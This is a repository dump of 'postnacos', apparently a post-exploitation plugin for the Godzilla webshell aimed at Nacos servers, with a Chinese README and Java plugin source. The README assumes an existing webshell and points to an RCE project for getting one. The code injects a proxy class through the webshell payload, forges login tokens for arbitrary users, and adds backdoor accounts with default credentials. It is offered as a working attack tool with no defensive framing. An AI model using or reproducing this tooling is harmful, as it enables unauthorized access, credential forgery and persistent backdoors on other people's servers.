├── .gitignore
├── README.md
├── postnacos.iml
└── src
├── .DS_Store
└── shells
├── .DS_Store
└── plugins
├── .DS_Store
└── postnacos
├── .DS_Store
├── PostNacosPlugin.form
├── PostNacosPlugin.java
└── PostNacosProxy.classs
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | src/.DS_Store
3 | .DS_Store
4 | src/.DS_Store
5 | src/shells/.DS_Store
6 | src/shells/plugins/.DS_Store
7 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # postnacos
2 | 哥斯拉nacos后渗透插件 maketoken adduser
3 |
4 |
5 | ## 功能简介
6 |
7 | 当你在Nacos拥有一个哥斯拉webshell之后,你就可以使用哥斯拉的Nacos后渗透插件
8 |
9 | 例如使用下面大哥项目打哥斯拉 shell
10 | https://github.com/c0olw/NacosRce
11 |
12 | MakeToken
13 | 生成特定用户的token
14 | AddUser
15 | 添加一个用户
16 |
17 |
18 | ## 如何使用
19 | 下载哥斯拉插件Jar包
20 |
21 | 然后打开哥斯拉 点击配置->点击插件配置->点击添加并选择你下载的Jar包
22 |
23 | 
24 |
25 |
26 | ## 部分功能演示
27 |
28 |
29 | ### MakeToken
30 | 
31 |
32 | 将生成后的token 保存进浏览器cookie
33 | 格式 token:{xxx}
34 |
35 | 
36 |
37 |
38 | ### Adduser
39 | 
40 |
--------------------------------------------------------------------------------
/postnacos.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/src/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/.DS_Store
--------------------------------------------------------------------------------
/src/shells/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/.DS_Store
--------------------------------------------------------------------------------
/src/shells/plugins/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/plugins/.DS_Store
--------------------------------------------------------------------------------
/src/shells/plugins/postnacos/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/plugins/postnacos/.DS_Store
--------------------------------------------------------------------------------
/src/shells/plugins/postnacos/PostNacosPlugin.form:
--------------------------------------------------------------------------------
1 |
2 |
74 |
--------------------------------------------------------------------------------
/src/shells/plugins/postnacos/PostNacosPlugin.java:
--------------------------------------------------------------------------------
1 | package shells.plugins.postnacos;
2 |
3 | import com.formdev.flatlaf.util.StringUtils;
4 | import core.Encoding;
5 | import core.annotation.PluginAnnotation;
6 | import core.imp.Payload;
7 | import core.imp.Plugin;
8 | import core.shell.ShellEntity;
9 | import core.ui.component.RTextArea;
10 | import core.ui.component.dialog.GOptionPane;
11 | import org.fife.ui.rtextarea.RTextScrollPane;
12 | import util.UiFunction;
13 | import util.automaticBindClick;
14 | import util.functions;
15 | import java.lang.reflect.Method;
16 | import util.http.ReqParameter;
17 |
18 | import javax.swing.*;
19 | import java.awt.*;
20 | import java.awt.event.ActionEvent;
21 | import java.util.Objects;
22 |
23 | @PluginAnnotation(payloadName = "JavaDynamicPayload",Name = "PostNacos",DisplayName = "PostNacos")
24 | public class PostNacosPlugin implements Plugin {
25 | private JButton makeTokenButton;
26 | private JButton addUserButton;
27 | private JButton updatePasswordButton;
28 | private JButton enumAllUserButton;
29 | private JButton enumAllSpaceButton;
30 | private RTextArea resultTextArea;
31 | private RTextScrollPane resultTextScrollPane;
32 |
33 | private ShellEntity shellEntity;
34 | private Payload payload;
35 | private boolean loaded = false;
36 | private static final String CLASS_NAME = "PostNacosProxy";
37 | private Encoding encoding;
38 | private JPanel corePanel;
39 |
40 | @Override
41 | public void init(ShellEntity shellEntity) {
42 | this.shellEntity = shellEntity;
43 | this.payload = shellEntity.getPayloadModule();
44 | this.encoding = shellEntity.getEncodingModule();
45 | automaticBindClick.bindJButtonClick(this,this);
46 | }
47 |
48 | @Override
49 | public JPanel getView() {
50 | return corePanel;
51 | }
52 |
53 | private boolean load(){
54 | if (!loaded){
55 | loaded = payload.include(CLASS_NAME, functions.readInputStreamAutoClose(Objects.requireNonNull(PostNacosPlugin.class.getResourceAsStream("PostNacosProxy.classs"))));
56 | }
57 | return loaded;
58 | }
59 | private void makeTokenButtonClick(ActionEvent actionEvent) {
60 | if (load()){
61 | String userName = GOptionPane.showInputDialog("target UserName","nacos");
62 | if (!StringUtils.isEmpty(userName)){
63 | ReqParameter reqParameter = new ReqParameter();
64 | reqParameter.add("username",encoding.Encoding(userName));
65 | resultTextArea.setText(encoding.Decoding(payload.evalFunc(CLASS_NAME,"MakeToken",reqParameter)));
66 | }
67 | }else {
68 | resultTextArea.setText("plugin not loaded");
69 | }
70 |
71 | }
72 | private void addUserButtonClick(ActionEvent actionEvent) {
73 | if (load()){
74 | JLabel userNameLabel = new JLabel("username:");
75 | JLabel passwordLabel = new JLabel("password:");
76 |
77 | JTextField usernameTextField= new JTextField("audit");
78 | JTextField passwordTextField = new JTextField("Password123!");
79 |
80 | JPanel propertyPanel = new JPanel();
81 | propertyPanel.setLayout(new GridLayout(3,2,5,5));
82 | propertyPanel.add(userNameLabel);
83 | propertyPanel.add(usernameTextField);
84 | propertyPanel.add(passwordLabel);
85 | propertyPanel.add(passwordTextField);
86 |
87 |
88 | int option = GOptionPane.showConfirmDialog( UiFunction.getParentWindow(corePanel),propertyPanel, "Input Property", GOptionPane.OK_CANCEL_OPTION);
89 |
90 | if (option == GOptionPane.CANCEL_OPTION){
91 | GOptionPane.showMessageDialog(UiFunction.getParentWindow(corePanel),"取消操作");
92 | return;
93 | }
94 |
95 | String userName = usernameTextField.getText();
96 | String password = passwordTextField.getText();
97 |
98 | if (!StringUtils.isEmpty(userName) && !StringUtils.isEmpty(password)){
99 | ReqParameter reqParameter = new ReqParameter();
100 | reqParameter.add("username",encoding.Encoding(userName));
101 | reqParameter.add("password",encoding.Encoding(password));
102 |
103 | resultTextArea.setText(encoding.Decoding(payload.evalFunc(CLASS_NAME,"userAdd",reqParameter)));
104 | }
105 | }else {
106 | resultTextArea.setText("plugin not loaded");
107 | }
108 | }
109 |
110 | }
111 |
--------------------------------------------------------------------------------
/src/shells/plugins/postnacos/PostNacosProxy.classs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pap1rman/postnacos/af3b1151eaad10eef96fa767b23d6b2674bb337e/src/shells/plugins/postnacos/PostNacosProxy.classs
--------------------------------------------------------------------------------